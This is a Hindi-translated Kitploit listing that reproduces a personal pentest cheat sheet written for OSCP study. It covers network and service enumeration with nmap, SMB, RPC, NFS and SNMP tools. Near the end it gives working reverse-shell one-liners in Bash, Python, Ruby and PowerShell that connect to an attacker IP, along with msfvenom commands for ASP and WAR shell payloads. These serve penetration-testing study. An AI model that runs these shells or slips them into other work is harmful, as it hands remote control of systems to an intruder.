Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Pentest-Cheat-Sheet — वहाँ बहुत सारी चीट शीट हैं, लेकिन यह मेरी है। | Kitploit
उपकरण/GitHubGitHub/d0n601/pentest-cheat-sheet
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीशोषणपार्श्व आंदोलनवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगचयनित संसाधन
GitHubd0n601/pentest-cheat-sheet
389181 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Pentest-Cheat-Sheet

वहाँ बहुत सारी चीट शीट हैं, लेकिन यह मेरी है।

रिपॉजिटरी देखें

पेंटेस्ट चीट शीट

बाहर बहुत सारी चीट शीट हैं, लेकिन यह मेरी है। यह अभी एक कार्य प्रगति पर है, और एक रफ ड्राफ्ट के रूप में रहती है जिसे बहुत, कभी-कभी अपडेट किया जाता है। मैंने इसे OSCP की पढ़ाई करते समय शुरू किया था, लेकिन अब यह और अधिक व्यावहारिक चीज़ों को शामिल करने के लिए विकसित हो रहा है जिनकी मुझे एक रेड टीमर के रूप में आवश्यकता है। नए जोड़ सबसे अधिक संभावना परीक्षा में काम के नहीं होंगे, और इसमें ऐसे टूल भी शामिल हो सकते हैं जिन पर प्रतिबंध है।

रिकॉन

बहुत अधूरा...

लिनक्स लोकल

find / -name flag.txt नाम के आधार पर फ़ाइलें खोजने के लिए।

grep -R "flag40" / -s -n फ़ाइलों में स्ट्रिंग की तलाश करें, रूट डायरेक्टरी से रिकर्सिव रूप से खोजें, कोई त्रुटि आउटपुट नहीं।

विंडोज़ लोकल

dir /s flag.txt वर्तमान डायरेक्टरी और सबडायरेक्टरीज़ में flag.txt नाम की फ़ाइलें खोजने के लिए।

एक्टिव डायरेक्टरी

एक उपयोगी टूल -> wadcoms.github.io

पोर्ट स्कैनिंग

nmap

nmap -sn 10.11.1.0/24 होस्ट खोजने के लिए नेटवर्क स्वीप।

  • nmap -sn 10.11.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt नेटवर्क स्वीप करें और जो IP उप हैं उन्हें खोजें, और IP पतों को एक सूची में सहेजें।

nmap -A 10.10.10.10 सामान्य TCP पोर्ट्स की त्वरित स्कैनिंग के लिए, OS और सेवा पहचान के साथ।

nmap -A 10.10.10.10 -p- OS और सेवा पहचान के साथ सभी TCP पोर्ट्स स्कैन करने के लिए।

nmap -A -sU 10.10.10.10 OS और सेवा पहचान के साथ सभी UDP पोर्ट्स स्कैन करने के लिए।

sudo nmap -O -A -sV 10.10.10.10 सभी सामान्य TCP पोर्ट्स स्कैन करने, OS की फिंगरप्रिंट करने, स्क्रिप्ट चलाने और बैनर हड़पने के लिए।

Proxychains के माध्यम से

proxychains nmap -Pn -sT 10.10.10.10 -v क्योंकि ICMP/UDP स्कैन काम नहीं करते।

Netcat

-w फ़्लैग टाइमआउट को सेकंड में निर्दिष्ट करता है और -z फ़्लैग शून्य डेटा भेजता है (स्कैनिंग के लिए)

nc -nvv -w 1 -z 10.11.1.220 3388-3390 पोर्ट 3388-3390 तक TCP स्कैन।

nc -nv -u -z -w 1 10.11.1.115 160-162 पोर्ट 160-162 तक UDP स्कैन।

डायरेक्टरी एन्यूमरेशन

Gobuster

  • डायरेक्टरी बस्टिंग उदाहरण gobuster dir -u http://10.1.1.27 -w /usr/share/wordlists/dirb/big.txt।

मुझे dirsearch भी पसंद है।

Kali पर उपयोगी वर्डलिस्ट

kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb  dirbuster  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt  rockyou.txt.gz  wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery  Fuzzing  IOCs  Miscellaneous  Passwords  Pattern-Matching  Payloads  README.md  Usernames  Web-Shells
kali@kali:~/Tools/dirsearch$ 

python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r dirb के big.txt के साथ डायरेक्टरी एन्यूमरेशन, कॉपी/पेस्ट करें और केवल IP/URL और एक्सटेंशन बदलें।

python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r dirbuster की डायरेक्टरी सूची के साथ डायरेक्टरी एन्यूमरेशन, कॉपी/पेस्ट करें और केवल IP/URL और एक्सटेंशन बदलें।

python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r, CGI का ब्रूट फोर्स करें।

साझा फ़ोल्डर एन्यूमरेट करें (rsync)

एक rsync मॉड्यूल अनिवार्य रूप से एक डायरेक्टरी शेयर है। इन मॉड्यूल को वैकल्पिक रूप से पासवर्ड द्वारा सुरक्षित किया जा सकता है। यह विकल्प उपलब्ध मॉड्यूल की सूची देता है और, वैकल्पिक रूप से, यह निर्धारित करता है कि मॉड्यूल तक पहुँचने के लिए पासवर्ड आवश्यक है या नहीं**:**:

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>

SMB एन्यूमरेशन

मैनुअल

smbclient -L 10.11.1.146 उपलब्ध शेयर सूचीबद्ध करने के लिए

smbclient //10.11.1.146/IPC$ उस शेयर में लॉगिन करने के लिए। यदि वह काम नहीं करता है, तो sudo आज़माएँ... sudo smbclient //10.11.1.146/IPC$

स्वचालित

enum4linux 10.11.1.146 -a -o smb शेयर को स्वचालित करने के लिए enum4linux का उपयोग करें।

RPC एन्यूमरेशन

यदि आप Null लॉगऑन के साथ कनेक्ट कर सकते हैं -> rpcclient -U '' -N forest.htb।

rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain:         HTB
Server:
Comment:
Total Users:    105
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> 

अच्छा लेख
एक और अच्छा

NFS

showmount -e 10.10.10.10 उपलब्ध माउंट देखने के लिए mount -t nfs 10.10.10.10:/ /tmp -o nolock रूट या जो भी फ़ोल्डर हो, उसे माउंट करने के लिए।

SNMP एन्यूमरेशन

onesixtyone -c community -i ips SNMP सर्वरों की पहचान करने के लिए लक्ष्य नेटवर्क स्कैन करें, जहां community और ips सूचियाँ हैं community = (public, private, manager)।

snmp-check 10.11.1.227 नीचे दिया गया सब कुछ करता है, लेकिन बेहतर और इसे आपके लिए अच्छे से फॉर्मेट करता है :)

snmpwalk -c public -v1 -t 10 10.11.1.115 पूरे MIB ट्री को एन्यूमरेट करें।

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 Windows उपयोगकर्ताओं को एन्यूमरेट करें।

snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 Windows पर चल रही प्रक्रियाओं को एन्यूमरेट करें।

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3 खुले TCP पोर्ट्स को एन्यूमरेट करें।

snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2 इंस्टॉल किए गए सॉफ़्टवेयर को एन्यूमरेट करें।

रिवर्स शेल

Bash

/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",8081).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

लिसनर

Netat

nc -lvp 4444 Netcat के साथ पोर्ट 4444 पर रिवर्स शेल सुनें (पकड़ें)

Span TTY शेल

python -c 'import pty; pty.spawn("/bin/bash")' या python3 -c 'import pty; pty.spawn("/bin/bash")'

MSFVenom

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f war > shell.war

टूल डाउनलोड करें